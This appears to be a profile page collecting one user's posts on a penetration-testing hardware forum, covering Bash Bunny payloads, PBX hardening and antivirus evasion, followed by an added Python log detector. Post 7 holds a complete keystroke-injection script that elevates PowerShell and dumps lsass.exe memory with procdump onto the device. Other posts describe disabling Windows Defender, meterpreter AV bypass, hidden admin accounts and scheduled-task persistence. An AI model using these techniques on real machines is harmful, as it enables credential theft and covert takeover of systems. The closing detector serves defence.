Everything posted by rottingsun

  1. There are a few basic strategies, some hardware based and some software based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly. Here's a presentation that's FreePBX based but includes general best practices. https://player.vimeo.com/video/130328541
  2. With mimikatz and all the derivatives being flagged more and more these days, I find it more effective to take a memdump of lsass using procdump, then run it through mimi in minidump mode.
  3. So I ended up having a major issue with a VMware host at work and missed the live. Anyone care to share their impressions of the PS?
  4. Just a few more hours until the new eagles land.
  5. Any further details on the device and what it is capable of, or do we have to wait until tomorrow?
  6. Oughta been interesting. I'll be watching the live stream intently. This blog refers to it as a "programmable MITM device". https://www.doyler.net/security-not-included/def-con-25-bsideslv-2017 I also saw someone on Twitter describe it as "an online tap with payload capability, like the bash bunny".
  7. Here's my working code for running an executable (procdump) from the bunny within powershell and saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object.
      LED Y 100
      source bunny_helpers.sh
      LED B 100
      ATTACKMODE HID STORAGE
      Q GUI r
      Q DELAY 500
      Q STRING powershell Start-Process powershell -Verb runAs
      Q ENTER
      Q DELAY 1000
      Q ALT y
      Q DELAY 500
      Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
      Q DELAY 500
      Q ENTER
      Q DELAY 500
      Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp
      Q ENTER
      Q DELAY 200
      Q STRING \$driveEject\=New-Object -comObject Shell.Application
      Q ENTER
      Q DELAY 200
      Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\)
      Q ENTER
      Q DELAY 200
      Q STRING exit
      Q ENTER
      LED FINISH
  8. Perhaps LLMNR, NETBIOS, and WPAD are all disabled on the target? Far fetched if it's a home PC, I know, but.
  9. Nice. I got mine in recently. My first payload was running procdump from the bunny and then saving the dump file onto the bunny for later mimikatz analysis.
  10. A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_ga_nai meterpreter rev_tcp payload to successfully bypass both.
  11. The latest Empire stagers actually have a bunny target.
  12. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
  13. I believe RDP locks the session of the currently logged in user, which would be a dead giveaway. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
  14. KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
  15. I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
  16. I would but I don't wanna be hungover for work tomorrow.
  17. Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description - "#OS: Windows (Requires Powershell and Admin Rights)". This would be a great payload for the case of a target running say Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably a lot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin.
  18. Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including:
      - The one I previously posted about. That is, making the new user invisible to the Windows logon screen.
      - Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter. EDIT: Actually it looks like the meterpreter shell already does this the way it's implemented here.
      - Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder.
      - Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP.
      The possibilities are endless. I guess I just need to break down and order a bunny.
  19. Very nice payload. It'd be sweet to go even a step further and hide the new user from the Windows login screen with reg commands, as per the technique outlined in this post: http://www.windowscentral.com/how-hide-specific-user-accounts-sign-screen-windows-10
  20. Here is what I always used for enumerating the duck by the label DUCKY:
      for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duckydrive=%d
      Then the ducky can actually be referenced by letter with the env var %duckydrive%.
  21. Most likely, but I have found the python/meterpreter/rev_tcp with pyherion encrypter to still be pretty reliable as far as AV evasion. As far as the new Defender API, as long as local admin perms are present on the target, you can use Set-MpPreference (Set-MpPreference -DisableRealtimeMonitoring $true for example) to turn off the various features of Defender. This is a bit "noisy", since a notification pops up immediately in the tray, but you could always quickly disable Defender, run mimikatz or some other payload, then re-enable Defender in the cleanup. I'm actually contemplating getting a bunny just for a payload similar to that. Start off in RO mode and disable Defender, loop with Get-MpPreference | fl DisableRealtimeMonitoring until the value becomes True, switch to RW mode and execute a payload, exfil to storage if necessary, switch back to RO mode, re-enable Defender.
  22. This. If your company can afford one, you will be blown away vs all others.
  23. Yes you can, but depending on the systems, it can be somewhat of a major pain in the ass to get it working just right.
  24. Actually interested to see if Hak5 has any thoughts on the situation (good, bad, or indifferent)? Seems like the entire deal was a bit bizarre.
  25. It was my understanding that pineap did work in that manner - that is, broadcast out SSIDs based on client probes. I could easily have gotten that wrong though. The audio on the talk was pretty bad. We may just have to wait for a tech doc or a follow up hangout.
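The procdump-on-lsass and Set-MpPreference techniques mentioned in posts 2, 7, 9 and 21 above, seen from the defender's side, as an added example that is not from any of the posts: a small Python detector run over constructed, simplified Sysmon-style log lines. The pipe-delimited field layout, the event IDs and the lsass allowlist are assumptions for the demo, not real Sysmon output or a vendor rule.

```python
import re

# Constructed sample log in a simplified pipe-delimited key=value form,
# modelled loosely on Sysmon event IDs 1 (process create) and 10 (process access).
SAMPLE_LOG = """\
EventID=1 | Image=C:\\Windows\\System32\\svchost.exe | CommandLine=svchost.exe -k netsvcs
EventID=1 | Image=E:\\payloads\\switch1\\Procdump\\procdump.exe | CommandLine=procdump.exe -accepteula -ma lsass.exe E:\\loot\\lsd.dmp
EventID=10 | SourceImage=E:\\payloads\\switch1\\Procdump\\procdump.exe | TargetImage=C:\\Windows\\System32\\lsass.exe | GrantedAccess=0x1FFFFF
EventID=10 | SourceImage=C:\\Windows\\System32\\csrss.exe | TargetImage=C:\\Windows\\System32\\lsass.exe | GrantedAccess=0x1000
EventID=1 | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine=powershell Set-MpPreference -DisableRealtimeMonitoring $true
"""

# Assumed allowlist of processes that routinely open lsass.exe; tune it per fleet.
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010  # access right any memory dump of lsass needs

LSASS_CMDLINE = re.compile(r"\blsass(\.exe)?\b", re.IGNORECASE)
DEFENDER_RTP_OFF = re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.IGNORECASE)


def parse_line(line):
    """Split 'k=v | k=v | ...' into a dict; values may themselves contain spaces or '='."""
    return dict(field.split("=", 1) for field in line.split(" | "))


def detect(log_text):
    """Return (rule_name, line) for every log line that trips a rule."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        eid = ev.get("EventID")
        if eid == "10" and ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            # A non-allowlisted process opened lsass with read access: a dump is likely in progress.
            source = ev.get("SourceImage", "").rsplit("\\", 1)[-1].lower()
            granted = int(ev.get("GrantedAccess", "0x0"), 16)
            if source not in LSASS_ALLOWLIST and granted & PROCESS_VM_READ:
                alerts.append(("lsass_memory_read", line))
        elif eid == "1":
            cmd = ev.get("CommandLine", "")
            if LSASS_CMDLINE.search(cmd):
                alerts.append(("lsass_in_cmdline", line))
            if DEFENDER_RTP_OFF.search(cmd):
                alerts.append(("defender_realtime_disabled", line))
    return alerts
```

On the sample above the csrss access (limited-information rights only) stays quiet while the procdump create, the procdump read of lsass and the real-time-monitoring change each raise one alert.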